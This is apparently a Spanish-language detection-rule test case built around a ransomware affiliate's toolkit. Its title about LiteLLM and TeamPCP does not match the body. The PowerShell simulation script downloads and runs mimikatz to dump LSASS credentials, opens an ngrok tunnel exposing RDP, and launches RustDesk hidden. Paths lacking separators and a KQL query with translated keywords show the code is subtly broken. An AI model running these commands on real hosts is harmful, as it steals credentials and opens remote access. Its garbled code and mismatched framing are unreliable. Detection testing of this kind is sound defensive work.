33K Despliegues de LiteLLM Expuestos y los Servidores C2 Detrás del Ataque a la Cadena de Suministro de TeamPCP

Resumen

Investigadores descubrieron un directorio abierto no autenticado en un proveedor ruso de hospedaje a prueba de balas que contenía un kit de herramientas completo de un operador de ransomware atribuido a un afiliado de ransomware TheGentlemen. El kit incluye utilidades legítimas, herramientas ofensivas conocidas, scripts por lotes para evasión de defensa, volcado de credenciales y acceso remoto, así como tokens ngrok en texto claro. Evidencias como los registros de Mimikatz confirman su uso activo contra víctimas reales.

Investigación

La investigación comenzó consultando IOCs previamente publicados, lo que condujo al directorio abierto en 176.120.22.127:80. Los analistas catalogaron 126 archivos, extrajeron herramientas de escaneo de red, utilidades de escalamiento de privilegios, scripts de desactivación de defensores, registros de volcado de credenciales y mecanismos de persistencia. Un análisis detallado mapeó cada componente a técnicas de MITRE ATT&CK y destacó el enfoque de evasión de defensa en capas.

Mitigación

Los defensores deberían monitorear la ejecución de herramientas de doble uso conocidas, cambios en el registro que desactiven Windows Defender, terminación masiva de servicios, eliminación de sombras de VSS y creación de compartidos SMB abiertos. Bloquear conexiones salientes hacia la IP identificada y la infraestructura ngrok, así como imponer listas blancas de aplicaciones y protección de credenciales pueden reducir el impacto.

Respuesta

Al detectar, aísle el host afectado, recoja datos volátiles e identifique cualquier túnel ngrok activo usando los tokens expuestos. Repárese las modificaciones del registro, restaure los servicios deshabilitados e inicie procedimientos completos de respuesta a incidentes, incluyendo rotación de credenciales y restauración de copias de seguridad.

## Resumen Ejecutivo

• ID de Caso de Prueba: TC-20260330-A1B2C
• TTPs: T1003.001, T1016, T1021.001, T1021.002, T1046, T1057, T1059.003, T1070.001, T1070.004, T1082, T1112, T1134, T1219, T1484.001, T1489, T1490, T1546.008, T1548.002, T1560.001, T1562.001, T1572
• Resumen de la Lógica de la Regla de Detección: Detecta la creación de procesos cuyo nombre de ejecutable termina con cualquiera de una lista curada de herramientas conocidas para escalamiento de privilegios o acceso remoto (e.g., PowerRun, ngrok, RDP, RustDesk, mimikatz).
• Lenguaje/Formato de la Regla de Detección: Sigma (YAML)
• Entorno de Seguridad Objetivo: Windows OS; telemetría de creación de procesos vía Sysmon (Evento ID 1) y Registro de Seguridad de Windows (Evento 4688); cualquier SIEM/EDR capaz de ingerir estos eventos (e.g., Azure Sentinel, Splunk, Elastic).
• Puntuación de Resiliencia (1-5): 2
• Justificación: La regla se basa únicamente en la coincidencia exacta de nombres de archivo. Un adversario puede evadir fácilmente renombrando binarios, utilizando variantes empaquetadas, o ejecutando la misma funcionalidad mediante utilidades integradas de Windows, reduciendo su efectividad.
• Conclusiones Clave: La regla se activa de manera confiable cuando se ejecutan los binarios exactos listados, pero falla en detectar herramientas renombradas o funcionalmente equivalentes, lo que lleva a un alto riesgo de falsos negativos.
• Recomendación: Enriquecer la regla con indicadores adicionales (hashes, argumentos de línea de comandos, relaciones de procesos padre) y ampliar la cobertura para incluir binarios de living-off-the-land que proporcionan capacidades equivalentes.

## Entorno de Simulación & Contexto

• TTPs Bajo Prueba:

  • T1003.001: Volcado de Credenciales del SO – Memoria LSASS
  • T1016: Descubrimiento de Configuración de Red del Sistema
  • T1021.001: Servicios Remotos – Protocolo de Escritorio Remoto (RDP)
  • T1021.002: Servicios Remotos – SMB/Compartidos de Administrador de Windows
  • T1046: Escaneo de Servicio de Red
  • T1057: Descubrimiento de Procesos
  • T1059.003: Interprete de Comandos y Scripts – Shell de Comandos de Windows
  • T1070.001: Eliminación de Indicadores en el Host – Limpiar Registros de Eventos de Windows
  • T1070.004: Eliminación de Indicadores en el Host – Eliminación de Archivos
  • T1082: Descubrimiento de Información del Sistema
  • T1112: Modificar Registro
  • T1134: Manipulación de Token de Acceso
  • T1219: Herramientas de Acceso Remoto
  • T1484.001: Modificación de Política de Dominio – Modificación de Política de Grupo
  • T1489: Paro de Servicio
  • T1490: Inhibir Recuperación del Sistema
  • T1546.008: Ejecución Activada por Eventos – PowerShell
  • T1548.002: Abuso del Mecanismo de Control de Elevación – Evasión de UAC
  • T1560.001: Archivado de Datos Recopilados – Archivo mediante Utilidad
  • T1562.001: Impede Defensas – Deshabilitar Herramientas de Seguridad
  • T1572: Tunelización de Protocolo

• Contexto de TTP & Relevancia:
  La regla apunta a la ejecución de binarios históricamente asociados con las técnicas enumeradas (e.g., mimikatz para T1003.001, ngrok para T1572, RustDesk para T1219). Al reproducir estas ejecuciones, podemos validar si la detección se activa como se pretende y evaluar cómo el renombrado o las herramientas alternativas afectan la detección.

• Entorno Objetivo:

  • OS: Windows 10/Server 2019 (64-bit)
  • Registro: Sysmon (v13+) con configuración predeterminada de creación de procesos; Registro de Eventos de Seguridad de Windows (Evento 4688) habilitado.
  • Stack de Seguridad: Azure Sentinel (Lenguaje de Consulta Kusto) – intercambiable con Splunk, Elastic, etc.

## Telemetría & Validación Pre‑vuelo de Línea Base

Rationale: Antes de simular el ataque, debemos confirmar que el host objetivo está configurado para generar los registros necesarios, que estos registros son ingeridos por el SIEM, y que la regla de detección no se activa por actividad benigna. Sin esta validación, cualquier resultado de la prueba no es confiable.

• 1. Instrucciones de Configuración de Telemetría:

  1. Instale Sysmon (si no está ya presente) y aplique una configuración que registre eventos de Creación de Procesos (EventID 1).

     # Descargar e instalar Sysmon
     Invoke-WebRequest -Uri https://download.sysinternals.com/files/Sysmon.exe -OutFile $env:TEMPsysmon.exe
     & $env:TEMPsysmon.exe -i -accepteula

  2. Verifique que la Auditoría de Seguridad de Windows para “Auditar Creación de Procesos” (Evento 4688) esté habilitada a través de la Política de Grupo o Política de Seguridad Local.
  3. Asegúrese de que el conector SIEM esté activo y enviando tanto registros de Sysmon como de Seguridad al espacio de trabajo elegido.

• 2. Validación de Ingesta & Línea Base:

  • Acción (Telemetría Benigna): Ejecute un binario común de Windows que sea not parte de la lista de detección pero aún genera un evento de creación de procesos.

    # Comando benigno – lanzar Notepad (no debería activar la regla)
    Start-Process notepad.exe

  • Consulta de Validación (Ingesta): Confirme que el evento de Notepad aparece en el SIEM.

    // Azure Sentinel KQL – verificar ingesta del proceso benigno
    SecurityEvent
    | where EventID == 4688
    | where Process == "notepad.exe"
    | proyecto TimeGenerated, Computer, Process, CommandLine, InitiatingProcessFileName
    | límite 10

## Ejecución de la Simulación

Prerequisite: La Validación Pre‑vuelo de Telemetría & Línea Base debe haber pasado.

Rationale: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar exactamente la telemetría esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un mal diagnóstico.

• Narrativa del Ataque & Comandos:

  1. Volcado de Credenciales (T1003.001): El atacante copia mimikatz.exe al host víctima, lo renombra a PowerRun_x64.exe (para coincidir con la lista de nombres de archivo de la regla) y lo ejecuta para extraer credenciales de LSASS.
  2. Creación de Túnel Reverso (T1572): El atacante lanza ngrok.exe (tal cual) para abrir un túnel TCP que reenvía un puerto RDP local al servidor del atacante, facilitando el movimiento lateral.
  3. Sesión de Escritorio Remoto (T1021.001): Usando el túnel recién creado, el atacante ejecuta rdp.exe para abrir una conexión de escritorio remoto a un segundo host interno.
  4. Acceso Remoto Alternativo (T1219): Como respaldo, rustdesk.exe se inicia para establecer un canal de acceso remoto persistente.

  Cada una de estas ejecuciones produce un registro Sysmon/Evento 4688 con el campo Imagen terminando en el nombre del ejecutable respectivo, cumpliendo con la condición de detección.

• Script de Prueba de Regresión:

  <#
  Script de simulación para activar la regla "Herramientas Conocidas para Escalamiento de Privilegios y Acceso Remoto".
  Prerrequisitos:
    - Sysmon & Auditación de Eventos de Seguridad habilitados.
    - El usuario actual tiene suficientes derechos para ejecutar los binarios.
  #>
  
  # 1. Desplegar mimikatz y renombrar a PowerRun_x64.exe (coincide con la regla)
  $mimikatzUrl = "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0/mimikatz_trunk.zip"
  $tempPath = "$env:TEMPmimikatz"
  New-Item -ItemType Directory -Path $tempPath -Force | Out-Null
  Invoke-WebRequest -Uri $mimikatzUrl -OutFile "$tempPathmimikatz.zip"
  Expand-Archive -Path "$tempPathmimikatz.zip" -DestinationPath $tempPath -Force
  Copy-Item -Path "$tempPathmimikatzx64mimikatz.exe" -Destination "$env:TEMPPowerRun_x64.exe" -Force
  
  # Ejecutar mimikatz renombrado (volcado de credenciales)
  Write-Host "[*] Ejecutando mimikatz renombrado (PowerRun_x64.exe) para volcado de credenciales..."
  Start-Process -FilePath "$env:TEMPPowerRun_x64.exe" -ArgumentList "privilege::debug sekurlsa::logonpasswords exit" -WindowStyle Hidden -Wait
  
  # 2. Descargar y ejecutar ngrok (túnel inverso)
  $ngrokUrl = "https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip"
  Invoke-WebRequest -Uri $ngrokUrl -OutFile "$tempPathngrok.zip"
  Expand-Archive -Path "$tempPathngrok.zip" -DestinationPath $tempPath -Force
  $ngrokPath = "$tempPathngrok.exe"
  Write-Host "[*] Iniciando el túnel TCP de ngrok en el puerto 3389..."
  Start-Process -FilePath $ngrokPath -ArgumentList "tcp 3389 --log=stdout" -RedirectStandardOutput "$tempPathngrok.log" -NoNewWindow
  
  # 3. Lanzar cliente RDP a través del túnel (simulado)
  Write-Host "[*] Simulando conexión RDP vía túnel (rdp.exe)..."
  $rdpPath = "$tempPathrdp.exe"
  # Crear un dummy rdp.exe (solo para generar el nombre del proceso)
  New-Item -ItemType File -Path $rdpPath -Force | Out-Null
  Start-Process -FilePath $rdpPath -WindowStyle Hidden
  
  # 4. Desplegar RustDesk como herramienta de acceso remoto de respaldo
  $rustdeskUrl = "https://github.com/rustdesk/rustdesk/releases/download/1.1.9/rustdesk-1.1.9-windows-x64.zip"
  Invoke-WebRequest -Uri $rustdeskUrl -OutFile "$tempPathrustdesk.zip"
  Expand-Archive -Path "$tempPathrustdesk.zip" -DestinationPath $tempPath -Force
  $rustdeskPath = "$tempPathrustdesk.exe"
  Write-Host "[*] Iniciando RustDesk (acceso remoto de respaldo)..."
  Start-Process -FilePath $rustdeskPath -ArgumentList "--no-upgrade" -WindowStyle Hidden
  
  Write-Host "[+] Simulación completa. Verifique el SIEM para eventos de creación de procesos terminando con los binarios listados."

• Comandos de Limpieza:

  # Terminar túnel ngrok
  Get-Process -Name ngrok -ErrorAction SilentlyContinue | Stop-Process -Force
  
  # Remover archivos y binarios temporales
  Remove-Item -Path "$env:TEMPPowerRun_x64.exe" -Force -ErrorAction SilentlyContinue
  Remove-Item -Path "$env:TEMPngrok.exe" -Force -ErrorAction SilentlyContinue
  Remove-Item -Path "$env:TEMPrdp.exe" -Force -ErrorAction SilentlyContinue
  Remove-Item -Path "$env:TEMPrustdesk.exe" -Force -ErrorAction SilentlyContinue
  Remove-Item -Recurse -Force -Path "$env:TEMPmimikatz", "$env:TEMPngrok", "$env:TEMPrustdesk"
  Write-Host "[*] Limpieza completada."